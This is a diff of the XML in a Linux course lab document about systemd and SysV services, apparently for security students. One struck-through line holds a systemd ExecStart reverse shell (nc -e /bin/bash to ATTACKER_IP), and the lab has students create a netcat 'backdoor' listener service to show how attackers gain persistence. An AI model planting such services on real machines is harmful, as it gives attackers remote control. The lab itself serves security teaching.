     </w:p>
     <w:p>
@@ -1888,7 +2701,17 @@
         <w:t>run level 3</w:t>
       </w:r>
       <w:r>
-        <w:t>”, where graphical.target is not running, by using</w:t>
+        <w:t xml:space="preserve">”, where </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is not running, by using</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -1898,13 +2721,22 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
-        <w:t>systemctl isolate multi-user.target</w:t>
-      </w:r>
+        <w:t>systemctl isolate multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
         <w:br/>
       </w:r>
       <w:r>
@@ -1913,7 +2745,27 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>This will cause all services required by the multi-user.target unit file to continue or start, as needed.  All services not required by multi-user.target (all the graphical stuff in our case) will be stopped.</w:t>
+        <w:t>This will cause all services required by the multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> unit file to continue or start, as needed.  All services not required by multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (all the graphical stuff in our case) will be stopped.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1934,8 +2786,19 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
-        <w:t>systemctl isolate graphical.target</w:t>
-      </w:r>
+        <w:t xml:space="preserve">systemctl isolate </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1967,7 +2830,14 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -na</w:t>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>na</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1975,6 +2845,7 @@
         </w:rPr>
         <w:t>t</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -2100,12 +2971,53 @@
       <w:r>
         <w:br/>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:strike/>
         </w:rPr>
-        <w:t>ExecStart=/usr/bin/nc -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
+        <w:t>ExecStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t>=/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:strike/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2166,74 +3078,119 @@
         <w:t>allow a remote machine to connect and send data</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve">.  The backdoor service doesn’t do anything with the data, but it is fun </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>anyway.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ExecStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>=/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l 1234</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Once you have enabled, then started the new service you made, you can see if the service is running with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ss</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nat</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>If you have the time and energy, you can</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> make a real back door</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in Extra </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Extra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Fun</w:t>
+      </w:r>
+      <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">There are ways </w:t>
-      </w:r>
-      <w:r>
-        <w:t>to make this a full-fledged back door</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, but they are too complicated for this lab.)</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ExecStart=/bin/nc -l 1234</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Once you have enabled, then started the new service you made, you can see if the service is running with </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">with </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ss</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>nat</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.  Later on we will make a real back door.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>Extra Extra Fun</w:t>
+        <w:t xml:space="preserve">Extra </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Extra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Fun</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
+++ b/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -21,40 +21,26 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>In Canvas</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, read</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">     </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Apps and Services--SysV</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.pdf</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">     </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Linux Systemd</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.pdf</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Listen to or read CyberAces Module 1 Linux, Session 5, Applications and Services (</w:t>
+        <w:t xml:space="preserve">Listen to or read </w:t>
       </w:r>
       <w:hyperlink r:id="rId5" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>CyberAces</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> Module 1 Linux, Session 5, Applications and Services</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  These slides cover the current method of controlling services, systemd </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId6" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -67,32 +53,82 @@
       </w:r>
       <w:r>
         <w:br/>
+        <w:t xml:space="preserve">Direct link to the video:  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://youtu.be/x9oLHTKH36I</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">Direct link to the slides:  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt1d2f7b61847e2cf1/625458a97e7b344b2534e435/CyberAces_Module1-Linux_5_AppsAndServices.pdf</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
         <w:t>Do the exercises in the CyberAces module!</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:t>In Canvas</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, read</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">     </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Apps and Services--SysV</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.pdf</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">     </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Linux Systemd</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.pdf</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve">These slide decks attempt to give you a feeling of where the SysV and systemd come from and the basics of how they work.  There may be more detail than you really want.  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">The most important things are the day to day </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>uses:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
+        <w:t xml:space="preserve">The most important things are the day to day uses:  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -116,11 +152,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>There is no built-in GUI for systemd, so it is especially good to know basic systemd commands.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
@@ -130,15 +161,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Most Linux distros have replaced SysV with systemd; Ubuntu 15 and up, CentOS 7 and up, and Fedora 14 and up.  However, systemd retains backward compatibility with SysV.  We still need to know the basics of SysV since attackers can use SysV to enable backdoor services that automatically start at </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>reboot</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> so they don’t lose their hold on the computer.  </w:t>
+        <w:t xml:space="preserve">Most Linux distros have replaced SysV with systemd; Ubuntu 15 and up, CentOS 7 and up, and Fedora 14 and up.  However, systemd retains backward compatibility with SysV.  We still need to know the basics of SysV since attackers can use SysV to enable backdoor services that automatically start at boot so they don’t lose their hold on the computer.  </w:t>
       </w:r>
       <w:r>
         <w:t>(The security term for this is persistence.)</w:t>
@@ -264,15 +287,8 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>openssh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-server.  You can find it in the Ubuntu Software Center GUI, </w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called openssh-server.  You can find it in the Ubuntu Software Center GUI, </w:t>
       </w:r>
       <w:r>
         <w:t>or</w:t>
@@ -287,21 +303,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t xml:space="preserve">sudo apt install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>openssh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>-server</w:t>
+        <w:t>sudo apt install openssh-server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -309,7 +311,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F802040" wp14:editId="7A1A14C2">
             <wp:extent cx="5219700" cy="2400727"/>
@@ -326,7 +327,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId9"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -355,44 +356,8 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>sbin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>/usr/sbin/sshd</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -400,15 +365,7 @@
         <w:t>for SSH Daemon.  The service</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> name is ssh in Ubuntu; in RedHat variants it is called </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.  Go figure.</w:t>
+        <w:t xml:space="preserve"> name is ssh in Ubuntu; in RedHat variants it is called sshd.  Go figure.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -417,6 +374,9 @@
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Backwards compatibility with SysV </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(optional)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -447,1026 +407,6 @@
             <wp:extent cx="5220269" cy="1916302"/>
             <wp:effectExtent l="0" t="0" r="0" b="8255"/>
             <wp:docPr id="2" name="Picture 2"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5330637" cy="1956817"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:t>&lt;snip&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>You will see later that the output is the same as what you get with the systemd commands.  The SysV commands have been intercepted and passed to systemd.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Practice using the SysV </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>service</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> command </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">to stop, start, and restart the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> service.  Each time you change the service, use</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>service ssh status</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:t>to check that the previous command worked as you think it should.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve">When you are done, make sure the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> service is stopped.</w:t>
-      </w:r>
-    </w:p>
